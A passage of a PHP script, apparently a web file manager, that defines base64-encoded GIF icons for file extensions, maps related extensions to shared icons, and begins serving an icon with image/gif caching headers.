"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci".

"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd".

"FxEAOw==",

"ext_jpg"=>

"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA".

"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci".

"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd".

"FxEAOw==",

"ext_js"=>

"R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMD//wCAgAAAAAAAAAADUCi63CEgxibH".

"k0AQsG200AQUJBgAoMihj5dmIxnMJxtqq1ddE0EWOhsG16m9MooAiSWEmTiuC4Tw2BB0L8FgIAhs".

"a00AjYYBbc/o9HjNniUAADs=",

"ext_lnk"=>

"R0lGODlhEAAQAGYAACH5BAEAAFAALAAAAAAQABAAhgAAAABiAGPLMmXMM0y/JlfFLFS6K1rGLWjO".

"NSmuFTWzGkC5IG3TOo/1XE7AJx2oD5X7YoTqUYrwV3/lTHTaQXnfRmDGMYXrUjKQHwAMAGfNRHzi".

"Uww5CAAqADOZGkasLXLYQghIBBN3DVG2NWnPRnDWRwBOAB5wFQBBAAA+AFG3NAk5BSGHEUqwMABk".

"AAAgAAAwAABfADe0GxeLCxZcDEK6IUuxKFjFLE3AJ2HHMRKiCQWCAgBmABptDg+HCBZeDAqFBWDG".

"MymUFQpWBj2fJhdvDQhOBC6XF3fdR0O6IR2ODwAZAHPZQCSREgASADaXHwAAAAAAAAAAAAAAAAAA".

"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

"AAAAAAAAAAAAAAAAAAAAAAeZgFBQPAGFhocAgoI7Og8JCgsEBQIWPQCJgkCOkJKUP5eYUD6PkZM5".

"NKCKUDMyNTg3Agg2S5eqUEpJDgcDCAxMT06hgk26vAwUFUhDtYpCuwZByBMRRMyCRwMGRkUg0xIf".

"1lAeBiEAGRgXEg0t4SwroCYlDRAn4SmpKCoQJC/hqVAuNGzg8E9RKBEjYBS0JShGh4UMoYASBiUQ".

"ADs=",

"ext_log"=>

"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAgwAAAMDAwICAgICAAAAAgAAAAAAA".

"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARQEKEwK6UyBzC475gEAltJklLRAWzbClRhrK4Ly5yg7/wN".

"zLUaLGBQBV2EgFLV4xEOSSWt9gQQBpRpqxoVNaPKkFb5Eh/LmUGzF5qE3+EMIgIAOw==",

"ext_m1v"=>

"R0lGODlhEAAQADMAACH5BAEAAAwALAAAAAAQABAAgwAAAICAgMDAwP///4AAAICAAACAAP//AP8A".

"AAAA/wCAgAD//wAAAAAAAAAAAAAAAARlkEkZapiY2iDEzUwwjMmSjN8kCoAXKEmXhsLADUJSFDYW".

"AKOa7bDzqG42UYFopHRqLMHOUDmungbDQTH74ToDQ0Fr8Ak5guy4QPCNWizCATFvq2xxBB1h91UJ".

"BHx9IBOAg4SIDBEAOw==",

"ext_m3u"=>

"R0lGODlhEAAQAEQAACH5BAEAABUALAAAAAAQABAAhAAAAPLy8v+qAHNKAD4+Prl6ADIyMubm5v+4".

"SLa2tm5ubsDAwJ6ennp6ev/Ga1AyAP+Pa/+qJWJiYoCAgHMlAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

"AAAAAAAAAAAAAAAAAAVzYCWOlQSQAEWORMCcABENa9UG7lNExUnegcQAIeitgIoC0fjDNQYCokBh".

"8NmCUIdDKhi8roGGYMztugCARXgwcIzHg0TgYKikg9yCAkcfASZccXx1fhBjejhzhCIAhlNygytQ".

"PXeKNQMPPml9NVaMBDUVIQA7",

"ext_mdb"=>

"R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/".

"/ywAAAAAEAAQAAAEV/BIRKuV+KDHO0eAFBRjSRbfE6JeFxwqIAcdQm4FzB0A+5AP2qvDo3FM".

"P92DxzJtXpIlQHjr5KLMX2Dj2kmNrZ+XaSqPQ5NdBovWhD08DGJNb4Nk+LwsAgA7",

"ext_mid"=>

"R0lGODlhEAAQACIAACH5BAEAAAQALAAAAAAQABAAggAAAP///4CAgMDAwAAAAAAAAAAAAAAAAANE".

"SCTcrnCFSecQUVY6AoYCBQDiCIDlyJ1KOJGqxWoBWa/oq8t5bAeDWci0Awprtpgx91IGmcjKs7XZ".

"TBeDrHZ7NXm/pwQAOw==",

"ext_midi"=>

"R0lGODlhEAAQACIAACH5BAEAAAQALAAAAAAQABAAggAAAP///4CAgMDAwAAAAAAAAAAAAAAAAANE".

"SCTcrnCFSecQUVY6AoYCBQDiCIDlyJ1KOJGqxWoBWa/oq8t5bAeDWci0Awprtpgx91IGmcjKs7XZ".

"TBeDrHZ7NXm/pwQAOw==",

"ext_mov"=>

"R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/".

"/ywAAAAAEAAQAAAEU/DIg6q1M6PH+6OZtHnc8SDhSAIsoJHeAQiTCsuCoOR8zlU4lmIIGApm".

"CBdL1hruirLoQec0so5SQYKomAEeSxezRe5IRTCzGJ3+rEGhzJtMb0UAADs=",

"ext_mp3"=>

"R0lGODdhEAAQAPcAAAAAACMjIyAgIEpKSgQNGxIWHzMzM0dISQIMHCwoHNqbMHNMAPj9/1RP".

"YZdfAP/NVP+5ADEqH1xpgjcZAP+6D//Mb/+vAB0YDgYLEzg4OJGcrzMUAOOWAP+9AP/AVf+qADs5".

"N0pOVh4eHhUVGLJyAP/AA/+vDP+1HP+0AOihABUMAGJqevWqEf/BMv+zLP/cqv+1APWPAPePAKha".

"ALjAy2NsfvqkAP+xAP/QefWsAPRtAP+eAP/OAE0YANTY4Tk5OQAABNC3e/qQAPZuAP/IAOeaAAwG".

"AL7F0QAADt61Xv9xAP+gAP/FAGU2AElXdAseMemaXfeJAP/KANeGAAkJCdXc6R0mMNePS/++AEUo".

"AImXrQgVLP/YALh9ACQmKxUcJkJCQiMmLGVJERgjOBMTEwsOFQAAAAAAAAAAAAAAAAAAAAAAAAAA".

"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACwAAAAAEAAQAAAIuwCRCByI".

"JEAAgggJChgwQIBAAgUSIhFg4MABBAkULGCQkKLFBg4eQIggAaHHAxMoVLBwAYNJDQc2cOjg4QOI".

"ECJGDBQAk0QJEydQpFCx4oAGhwEGHGDRwsULGDFkzKBR48AAg0pt3MCRQ8cOHj18/LB6UACQA0GE".

"DCFSxMgRJAcMOBQoIImSJUyaOHliUS5BKFGkTKFSxUrfuQKvYImQRcsWi3ERC+TSxcsXMGEOJxQz".

"hgxdhpIlCjQoMSAAOw==",

"ext_mp4"=>

"R0lGODdhEAAQAPcAAAAAACMjIyAgIEpKSgQNGxIWHzMzM0dISQIMHCwoHNqbMHNMAPj9/1RP".

"YZdfAP/NVP+5ADEqH1xpgjcZAP+6D//Mb/+vAB0YDgYLEzg4OJGcrzMUAOOWAP+9AP/AVf+qADs5".

"N0pOVh4eHhUVGLJyAP/AA/+vDP+1HP+0AOihABUMAGJqevWqEf/BMv+zLP/cqv+1APWPAPePAKha".

"ALjAy2NsfvqkAP+xAP/QefWsAPRtAP+eAP/OAE0YANTY4Tk5OQAABNC3e/qQAPZuAP/IAOeaAAwG".

"AL7F0QAADt61Xv9xAP+gAP/FAGU2AElXdAseMemaXfeJAP/KANeGAAkJCdXc6R0mMNePS/++AEUo".

"AImXrQgVLP/YALh9ACQmKxUcJkJCQiMmLGVJERgjOBMTEwsOFQAAAAAAAAAAAAAAAAAAAAAAAAAA".

"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACwAAAAAEAAQAAAIuwCRCByI".

"JEAAgggJChgwQIBAAgUSIhFg4MABBAkULGCQkKLFBg4eQIggAaHHAxMoVLBwAYNJDQc2cOjg4QOI".

"ECJGDBQAk0QJEydQpFCx4oAGhwEGHGDRwsULGDFkzKBR48AAg0pt3MCRQ8cOHj18/LB6UACQA0GE".

"DCFSxMgRJAcMOBQoIImSJUyaOHliUS5BKFGkTKFSxUrfuQKvYImQRcsWi3ERC+TSxcsXMGEOJxQz".

"hgxdhpIlCjQoMSAAOw==",

"ext_mpe"=>

"R0lGODlhEAAQADMAACH5BAEAAAsALAAAAAAQABAAgwAAAP///4CAgMDAwACAgICAAACAAP8AAP//".

"AIAAAAD//wAAAAAAAAAAAAAAAAAAAARqcMlBKxUyz8B7EJi2DF4nfCIJgiTgAtl6BoNAUvBik0RP".

"2zTYSQDgKQif00Co4ggKhRMgqKM4AwWE1MacTaFRAFdCpHEMBARBvCQ7SYY4cewmDtCFg4uo2REP".

"Bwh6fBovAAkHCYYihS4iEQA7",

"ext_mpeg"=>

"R0lGODlhEAAQADMAACH5BAEAAAsALAAAAAAQABAAgwAAAP///4CAgMDAwACAgICAAACAAP8AAP//".

"AIAAAAD//wAAAAAAAAAAAAAAAAAAAARqcMlBKxUyz8B7EJi2DF4nfCIJgiTgAtl6BoNAUvBik0RP".

"2zTYSQDgKQif00Co4ggKhRMgqKM4AwWE1MacTaFRAFdCpHEMBARBvCQ7SYY4cewmDtCFg4uo2REP".

"Bwh6fBovAAkHCYYihS4iEQA7",

"ext_mpg"=>

"R0lGODlhEAAQADMAACH5BAEAAAsALAAAAAAQABAAgwAAAP///4CAgMDAwACAgICAAACAAP8AAP//".

"AIAAAAD//wAAAAAAAAAAAAAAAAAAAARqcMlBKxUyz8B7EJi2DF4nfCIJgiTgAtl6BoNAUvBik0RP".

"2zTYSQDgKQif00Co4ggKhRMgqKM4AwWE1MacTaFRAFdCpHEMBARBvCQ7SYY4cewmDtCFg4uo2REP".

"Bwh6fBovAAkHCYYihS4iEQA7",

"ext_nfo"=>

"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAP///15phcfb6NLs/7Pc/+P0/3J+l9bs".

"/52nuqjK5/n///j///7///r//0trlsPn/8nn/8nZ5trm79nu/8/q/9Xt/9zw/93w/+j1/9Hr/+Dv".

"/d7v/73H0MjU39zu/9br/8ne8tXn+K6/z8Xj/LjV7dDp/6K4y8bl/5O42Oz2/7HW9Ju92u/9/8T3".

"/+L//+7+/+v6/+/6/9H4/+X6/+Xl5Pz//+/t7fX08vD//+3///P///H///P7/8nq/8fp/8Tl98zr".

"/+/z9vT4++n1/b/k/dny/9Hv/+v4/9/0/9fw/8/u/8vt/+/09xUvXhQtW4KTs2V1kw4oVTdYpDZX".

"pVxqhlxqiExkimKBtMPL2Ftvj2OV6aOuwpqlulyN3cnO1wAAXQAAZSM8jE5XjgAAbwAAeURBYgAA".

"dAAAdzZEaE9wwDZYpmVviR49jG12kChFmgYuj6+1xeLn7Nzj6pm20oeqypS212SJraCyxZWyz7PW".

"9c/o/87n/8DX7MHY7q/K5LfX9arB1srl/2+fzq290U14q7fCz6e2yXum30FjlClHc4eXr6bI+bTK".

"4rfW+NXe6Oby/5SvzWSHr+br8WuKrQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

"AAjgACsJrDRHSICDQ7IMXDgJx8EvZuIcbPBooZwbBwOMAfMmYwBCA2sEcNBjJCMYATLIOLiokocm".

"C1QskAClCxcGBj7EsNHoQAciSCC1mNAmjJgGGEBQoBHigKENBjhcCBAIzRoGFkwQMNKnyggRSRAg".

"2BHpDBUeewRV0PDHCp4BSgjw0ZGHzJQcEVD4IEHJzYkBfo4seYGlDBwgTCAAYvFE4KEBJYI4UrPF".

"CyIIK+woYjMwQQI6Cor8mKEnxR0nAhYKjHJFQYECkqSkSa164IM6LhLRrr3wwaBCu3kPFKCldkAA".

"Ow==",

"ext_ocx"=>

"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAIAAAP8AAP//AAAA/wD/AACAAAAAgICA".

"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARKMMlJq704620AQlMQAABlFMAwlIEgEESZnKg6tEJwwOVZ".

"IjfXKLHryRK4oaRDJByQwlQP1SQkUypAgdpsDYErruRAOpaPm7Q6HQEAOw==",

"ext_pcx"=>

"R0lGODlhEAAQADMAACH5BAEAAAoALAAAAAAQABAAgwAAAMDAwP///4CAgIAAAICAAP//AP8AAAAA".

"gAAA/wAAAAAAAAAAAAAAAAAAAAAAAARgUKlBqx0yDyEACBxHZRMXDGC4YQOwCVQKdJ7bggcBtl8Q".

"AJNfIBcoGD4CH1CBSAByxp5pOUAgCFFf6HexIKeore+2BaJ8p1sqaU6NpdOgiQJny5On+u+e7qH3".

"EzWCgwARADs=",

"ext_php"=>

"R0lGODlhEAAQAAAAACH5BAEAAAEALAAAAAAQABAAgAAAAAAAAAImDA6hy5rW0HGosffsdTpqvFlg".

"t0hkyZ3Q6qloZ7JimomVEb+uXAAAOw==",

"ext_pif"=>

"R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/".

"/ywAAAAAEAAQAAAEO/DISasEOGuNDkJMeDDjGH7HpmYd9jwazKUybG+tvOlA7gK1mYv3w7RW".

"mJRRiRQ2Z5+odNqxWK/YrDUCADs=",

"ext_pl"=>

"R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo".

"GLrc3gOAMYR4OOudreegRlBWSJ1lqK5s64LjWF3cQMjpJpDf6//ABAA7",

"ext_png"=>

"R0lGODlhEAAQADMAACH5BAEAAAoALAAAAAAQABAAgwAAAMDAwP///4CAgIAAAICAAP//AP8AAAAA".

"gAAA/wAAAAAAAAAAAAAAAAAAAAAAAARgUKlBqx0yDyEACBxHZRMXDGC4YQOwCVQKdJ7bggcBtl8Q".

"AJNfIBcoGD4CH1CBSAByxp5pOUAgCFFf6HexIKeore+2BaJ8p1sqaU6NpdOgiQJny5On+u+e7qH3".

"EzWCgwARADs=",

"ext_reg"=>

"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgACAgMDAwAD//wAAAAAAAANM".

"aCrcrtCIQCslIkprScjQxFFACYQO053SMASFC6xSEQCvvAr2gMuzCgEwiZlwwQtRlkPuej2nkAh7".

"GZPK43E0DI1oC4J4TO4qtOhSAgA7",

"ext_rev"=>

"R0lGODlhEAAQAFUAACH5BAEAAD8ALAAAAAAQABAAhQAAAOvz+1gdAFAAANDY4IYCU/9aZJIC".

"Wtvi7PmyheLq8xE2AAAyUNTc5DIyMr7H09jf5/L5/+Dg8PX6/4SHl/D4/5OXpKGmse/2/ZicqPb6".

"/28aIBlOAMHI0MzU3MXFHjJQAOfu9d7k7gA4Xv//sRVDAI0GUY0CU+Hn8ABbjfFwOABMfwhfL/99".

"0v+H1+hatf9syvRjwP+V3gA4boCAAABQhf+j5f++8P950FBQAN/n8PD2/HNzAABilgAAAAaRwIFw".

"SCz+MJpLhdMzOJ9PAqRQmJxKuNvs5crFZDBCwSIQcECItDqNIlAkGcejRqjb74C8fs8/JiskLD4e".

"BRERCSMpIg1TVTYqAZGRPBsCCw1jZTSVZZ0CAZdvcQ+SBwqfn5d8pacBqX5KJgEHtAcrrTsMjRM6".

"rKgLBQyZAiG+rh8tDKJyCc3OEQUdHQx81Xs/QQA7",

"ext_rmi"=>

"R0lGODlhFAAUAKL/AAAAAH8Af//4/8DAwL+/v39/fwAAAAAAACH5BAEAAAMALAAAAAAUABQAQANS".

"OLrcvkXIMKUg4BXCu8eaJV5C8QxRQAmqBTpFLM+nEk3qemUwXkmvxs3n4tWOyCRk5DKdhi0JYGpk".

"QFm6oNWyylaXud8uxI2Oe8zig8puf5WNBAA7",

"ext_rtf"=>

"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAgwAAAICAgMDAwICAAAAAgAAAAAAA".

"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao".

"a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=",

"ext_shtm"=>

"R0lGODlhEAAQAAAAACH5BAEAAAEALAAAAAAQABAAgAAAAAAAAAIdjI+pq+DAEIzpTXputLi9rmGc".

"ETbgR3aZmrIlVgAAOw==",

"ext_shtml"=>

"R0lGODlhEAAQAAAAACH5BAEAAAEALAAAAAAQABAAgAAAAAAAAAIdjI+pq+DAEIzpTXputLi9rmGc".

"ETbgR3aZmrIlVgAAOw==",

"ext_so"=>

"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP8AAP8A/wAAgIAAgP//AAAAAAAAAAM6".

"WEXW/k6RAGsjmFoYgNBbEwjDB25dGZzVCKgsR8LhSnprPQ406pafmkDwUumIvJBoRAAAlEuDEwpJ".

"AAA7",

"ext_stl"=>

"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAgwAAAP///wCAAMDAwAAAgP//AICAgICAAAAA".

"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARYEIlJK0VYmDE294YAZEMQFCZ6DiJpBsNRmuwoDephHGqd".

"GanYLBCyCYavYOsWIDQJUKePeXr1lprmM1ooklRJGrbkjEJhY7B6qvlwOh+sZb5EAO74PB4RAQA7",

"ext_swf"=>

"R0lGODlhFAAUAMQRAP+cnP9SUs4AAP+cAP/OAIQAAP9jAM5jnM6cY86cnKXO98bexpwAAP8xAP/O".

"nAAAAP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA".

"ABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKCMGgoOm4QB4GA".

"GBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEFxXRpDGEIA4xAQQNR1NHoMEAACABFhIz8rCncMAGgC".

"NysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs=",

"ext_sys"=>

"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAgv///wAAAICAgMDAwICAAP//AAAAAAAAAANJ".

"aLLc9lCASecQ8MlKB8ARRwVkEIqdqU0EEXCDqkxB4VZxSBTB8lqyTSD2+eVWE0lP8DrORgMiwLkZ".

"/aZBVOqkpUa/4KisRC6rEgA7",

"ext_tar"=>

"R0lGODlhEAAQAGYAACH5BAEAAEsALAAAAAAQABAAhgAAABlOAFgdAFAAAIYCUwA8ZwA8Z9DY4JIC".

"Wv///wCIWBE2AAAyUJicqISHl4CAAPD4/+Dg8PX6/5OXpL7H0+/2/aGmsTIyMtTc5P//sfL5/8XF".

"HgBYpwBUlgBWn1BQAG8aIABQhRbfmwDckv+H11nouELlrizipf+V3nPA/40CUzmm/wA4XhVDAAGD".

"UyWd/0it/1u1/3NzAP950P990mO5/7v14YzvzXLrwoXI/5vS/7Dk/wBXov9syvRjwOhatQCHV17p".

"uo0GUQBWnP++8Lm5AP+j5QBUlACKWgA4bjJQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

"AAAAAAAAAAAAAAAAAAAAAAeegAKCg4SFSxYNEw4gMgSOj48DFAcHEUIZREYoJDQzPT4/AwcQCQkg".

"GwipqqkqAxIaFRgXDwO1trcAubq7vIeJDiwhBcPExAyTlSEZOzo5KTUxMCsvDKOlSRscHDweHkMd".

"HUcMr7GzBufo6Ay87Lu+ii0fAfP09AvIER8ZNjc4QSUmTogYscBaAiVFkChYyBCIiwXkZD2oR3FB".

"u4tLAgEAOw==",

"ext_theme"=>

"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAAD/AAAA/wCAAAAA".

"gAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci".

"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd".

"FxEAOw==",

"ext_txt"=>

"R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ".

"SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7".

"UpPWG3Ig6Hq/XmRjuZwkAAA7",

"ext_url"=>

"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg4CAgAAAAMDAwP///wAA/wAAgACAAAD/AAAA".

"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARdEMk5gQU0IyuOMUV1XYf3ESEgrCwQnGgQAENdjwCBFjO7".

"Xj9AaYbjFArBme1mKeiQLpWvqdMJosXB1akKbGxSzvXqVXEGNKDAuyGq0NqriyJTW2QaRP3Ozktk".

"fRQRADs=",

"ext_vbe"=>

"R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMAAAP8AAAAAAAAAAAADRii63CEgxibH".

"kwDWEK3OACF6nDdhngWYoEgEMLde4IbS7SjPX93JrIwiIJrxTqTfERJUHTODgSAQ3QVjsZsgyu16".

"seAwLAEAOw==",

"ext_vbs"=>

"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAICAgMDAwAD//wCAgAAAAAAAAAAAAANQ".

"GLrcECXGJsWTJYyybbTQVBAkCBSgyKGPl2YjCcwnG2qrV13TQBI6GwbXqb0yCgCJJYSZOK4LZPDY".

"DHSvgEAQAGxrzQKNhgFtz+j0eM2eJQAAOw==",

"ext_vcf"=>

"R0lGODlhEAAQADMAACH5BAEAAAoALAAAAAAQABAAgwAAAMDAwICAAP//AAAA/4CAgIAAAAAAgP//".

"//8AAAAAAAAAAAAAAAAAAAAAAAAAAARYUElAK5VY2X0xp0LRTVYQAMWZaZWJAMJImiYVhEVmu7W4".

"srfeSUAUeFI10GBJ1JhEHcEgNiidDIaEQjqtAgiEjQFQXcK+4HS4DPKADwey3PjzSGH1VTsTAQA7",

"ext_wav"=>

"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU".

"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc".

"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=",

"ext_wma"=>

"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU".

"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc".

"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=",

"ext_wmf"=>

"R0lGODlhEAAQADMAACH5BAEAAAoALAAAAAAQABAAgwAAAMDAwP///4CAgIAAAICAAP//AP8AAAAA".

"gAAA/wAAAAAAAAAAAAAAAAAAAAAAAARgUKlBqx0yDyEACBxHZRMXDGC4YQOwCVQKdJ7bggcBtl8Q".

"AJNfIBcoGD4CH1CBSAByxp5pOUAgCFFf6HexIKeore+2BaJ8p1sqaU6NpdOgiQJny5On+u+e7qH3".

"EzWCgwARADs=",

"ext_wri"=>

"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAgwAAAICAgMDAwICAAAAAgAAAAAAA".

"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao".

"a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=",

"ext_xml"=>

"R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA".

"gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

"AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx".

"OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ".

"IQA7",

"ext_xsl"=>

"R0lGODlhEAAQAEQAACH5BAEAABIALAAAAAAQABAAhAAAAPHx8f///4aGhoCAAP//ADNmmabK8AAA".

"gAAAmQCAgDP//zNm/zOZ/8DAwDOZAAAA/zPM/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

"AAAAAAAAAAAAAAAAAAV3oDSMZDlKqBgIa8sKzpAOr9s6gqzWPOADItZhpVAwhCvgIHBICBSCRQMh".

"SAyVTZZiEXkgVlYl08loPCBUa0ApIBBWiDhSAHQXfLZavcAnABQGgYFJBHwDAAV+eWt2AAOJAIKD".

"dBKFfQABi0AAfoeZPEkSP6OkPyEAOw=="

);

$imgequals = array(

"ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"),

"ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml"),

"ext_htaccess"=>array("ext_htaccess","ext_htpasswd")

);

ksort($arrimg);

if (!$getall)

{

header("Content-type: image/gif");

header("Cache-control: public");

header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));

